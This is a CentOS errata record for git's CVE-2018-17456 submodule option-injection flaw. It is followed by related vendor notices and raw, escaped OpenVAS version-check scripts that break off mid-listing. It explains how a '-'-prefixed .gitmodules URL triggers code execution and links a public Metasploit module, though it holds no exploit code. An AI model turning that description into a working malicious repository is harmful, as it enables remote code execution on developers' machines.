ID: CESA-2020:0316
Type: centos
Reporter: CentOS Project
Modified: 2020-02-03T17:18:41
Description
CentOS Errata and Security Advisory CESA-2020:0316
Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.
Security Fix(es):
* git: arbitrary code execution via .gitmodules (CVE-2018-17456)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Merged security bulletin from advisories:
http://lists.centos.org/pipermail/centos-announce/2020-February/035619.html
Affected packages:
* emacs-git
* emacs-git-el
* git
* git-all
* git-cvs
* git-daemon
* git-email
* git-gui
* git-svn
* gitk
* gitweb
* perl-Git

Affected versions:
CentOS 6: packages with a version lower than 1.7.1-10.el6_10 (x86_64, i686 and noarch binary packages, and the git-1.7.1-10.el6_10.src.rpm source package).

Record details:
Title: emacs, git, gitk, gitweb, perl security update
Bulletin family: unix
Published: 2020-02-03T17:18:41
Last seen: 2020-02-03T22:36:14
CVSS: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Vulners score: 7.4
CVE list: CVE-2018-17456

References:
* http://steadfast.net/
* https://access.redhat.com/errata/RHSA-2020:0316
Related records for CVE-2018-17456:

CVE-2018-17456 (NVD; published 2018-10-06T14:29:00, modified 2020-08-24T17:37:00)
Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive "git clone" of a superproject if a .gitmodules file has a URL field beginning with a '-' character.
CWE: CWE-88
CVSS v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Link: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17456

Metasploit (MSF:EXPLOIT/MULTI/HTTP/GIT_SUBMODULE_URL_EXEC; published 2018-10-18T03:02:28, modified 2020-10-02T20:00:37)
Title: Malicious Git HTTP Server For CVE-2018-17456
A public exploit module exists for this issue. According to its description, the vulnerability is triggered when the submodules are initialised (e.g. git clone --recurse-submodules URL).
Source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/git_submodule_url_exec.rb
References cited by the module:
* https://marc.info/?l=git&m=153875888916397&w=2
* https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6
* https://blog.github.com/2018-10-05-git-submodule-vulnerability

Atlassian (ATLASSIAN:SRCTREE-6394; published 2019-01-23T22:43:28)
Title: Input validation vulnerability via Git in Sourcetree for Mac - CVE-2018-17456
There was an input validation vulnerability in Sourcetree for macOS via a Git repository with submodules. A remote attacker with permission to commit to a Git repository linked in Sourcetree for macOS is able to exploit this issue to gain code execution on the system.
Affected versions: Sourcetree for macOS before version 3.1.1.
Fix: upgrade Sourcetree for macOS to version 3.1.1 or higher from https://www.sourcetreeapp.com/
Link: https://jira.atlassian.com/browse/SRCTREE-6394

Atlassian (ATLASSIAN:SRCTREEWIN-11292; published 2019-01-23T22:56:09)
Title: Input validation vulnerability via Git in Sourcetree for Windows - CVE-2018-17456
There was an input validation vulnerability in Sourcetree for Windows via a Git repository with submodules. A remote attacker with permission to commit to a Git repository linked in Sourcetree for Windows is able to exploit this issue to gain code execution on the system.
Affected versions: Sourcetree for Windows before version 3.0.17.
Fix: upgrade Sourcetree for Windows to version 3.0.17 or higher from https://www.sourcetreeapp.com/
Link: https://jira.atlassian.com/browse/SRCTREEWIN-11292
Full advisory for both: https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2019-03-06-966678691.html

Fedora security updates listing CVE-2018-17456:
* Fedora 29 Update: git-2.19.1-1.fc29 (2018-10-09)
* Fedora 29 Update: libgit2-0.27.5-1.fc29 (2018-10-09)
* Fedora 28 Update: git-2.17.2-1.fc28 (2018-10-10)
* Fedora 28 Update: git-2.17.2-2.fc28 (2018-11-28)
* Fedora 28 Update: libgit2-0.26.7-1.fc28 (2018-10-16)
* Fedora 28 Update: libgit2-0.26.8-1.fc28 (2018-11-09)
* Fedora 27 Update: git-2.14.5-1.fc27 (2018-10-19)
* Fedora 27 Update: libgit2-0.26.7-1.fc27 (2018-10-14)
* Fedora 27 Update: libgit2-0.26.8-1.fc27 (2018-11-09)

OpenVAS (OPENVAS:1361412562310843657; published 2018-10-12, modified 2019-03-13)
Title: Ubuntu Update for git USN-3791-1
Package check: the remote host is missing an update for the 'git' package(s) announced via the referenced advisory.
Link: http://plugins.openvas.org/nasl.php?oid=1361412562310843657
A remote attacker could possibly use this to craft a\ngit repository that causes arbitrary code execution when recursive\noperations are used.\");\n script_tag(name:\"affected\", value:\"git on Ubuntu 18.04 LTS,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3791-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3791-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:1.9.1-1ubuntu0.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.17.1-1ubuntu0.3\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.7.4-0ubuntu1.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:33:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the ", "modified": 
"2020-01-31T00:00:00", "published": "2018-12-10T00:00:00", "id": "OPENVAS:1361412562310852170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852170", "type": "openvas", "title": "openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:4051-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852170\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-10 07:38:48 +0100 (Mon, 10 Dec 2018)\");\n script_name(\"openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:4051-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:4051-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-12/msg00019.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the openSUSE-SU-2018:4051-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for libgit2 fixes the following issues:\n\n\n Security issue fixed:\n\n - CVE-2018-17456: Submodule URLs and paths with a leading '-' are now\n ignored to avoid injecting options into library consumers that perform\n recursive clones (bsc#1110949).\n\n - Version update to version 0.26.8 (bsc#1114729).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1517=1\");\n\n script_tag(name:\"affected\", value:\"libgit2 on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26\", rpm:\"libgit2-26~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-debuginfo\", 
rpm:\"libgit2-26-debuginfo~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-debugsource\", rpm:\"libgit2-debugsource~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-devel\", rpm:\"libgit2-devel~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-32bit\", rpm:\"libgit2-26-32bit~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-32bit-debuginfo\", rpm:\"libgit2-26-32bit-debuginfo~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192389", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192389", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-2389)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2389\");\n script_version(\"2020-01-23T12:53:00+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:53:00 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:53:00 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-2389)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2389\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2389\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2019-2389 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive 'git clone' of a superproject if 
a .gitmodules file has a URL field beginning with a '-' character.(CVE-2018-17456)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~14.h4\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~14.h4\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "joernchen of Phenoelit discovered that git, a fast, scalable,\ndistributed revision control system, is prone to an arbitrary code\nexecution vulnerability via a specially crafted .gitmodules file in a\nproject cloned with --recurse-submodules.", "modified": "2019-07-04T00:00:00", "published": "2018-10-05T00:00:00", "id": "OPENVAS:1361412562310704311", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704311", "type": "openvas", "title": "Debian Security Advisory DSA 4311-1 (git - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4311-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text 
descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704311\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_name(\"Debian Security Advisory DSA 4311-1 (git - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-05 00:00:00 +0200 (Fri, 05 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4311.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", 
re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"git on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u4.\n\nWe recommend that you upgrade your git packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/git\");\n script_tag(name:\"summary\", value:\"joernchen of Phenoelit discovered that git, a fast, scalable,\ndistributed revision control system, is prone to an arbitrary code\nexecution vulnerability via a specially crafted .gitmodules file in a\nproject cloned with --recurse-submodules.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"git\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-all\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-arch\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-core\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-sysvinit\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-doc\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-el\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-email\", ver:\"1:2.11.0-3+deb9u4\", 
rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-gui\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-man\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-mediawiki\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-svn\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitk\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitweb\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:33:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310852092", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852092", "type": "openvas", "title": "openSUSE: Security Advisory for git (openSUSE-SU-2018:3178-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852092\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:47:19 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for git (openSUSE-SU-2018:3178-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3178-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00030.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the openSUSE-SU-2018:3178-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for git fixes the following issues:\n\n - CVE-2018-17456: Git allowed remote code execution during processing of a\n recursive 'git clone' of a superproject if a .gitmodules file has a URL\n field beginning with a '-' character. 
(boo#1110949).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1177=1\");\n\n script_tag(name:\"affected\", value:\"git on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-arch\", rpm:\"git-arch~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core\", rpm:\"git-core~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core-debuginfo\", rpm:\"git-core-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring\", rpm:\"git-credential-gnome-keyring~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring-debuginfo\", rpm:\"git-credential-gnome-keyring-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-libsecret\", rpm:\"git-credential-libsecret~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"git-credential-libsecret-debuginfo\", rpm:\"git-credential-libsecret-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon-debuginfo\", rpm:\"git-daemon-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debuginfo\", rpm:\"git-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debugsource\", rpm:\"git-debugsource~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-p4\", rpm:\"git-p4~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn-debuginfo\", rpm:\"git-svn-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-web\", rpm:\"git-web~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-doc\", rpm:\"git-doc~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n 
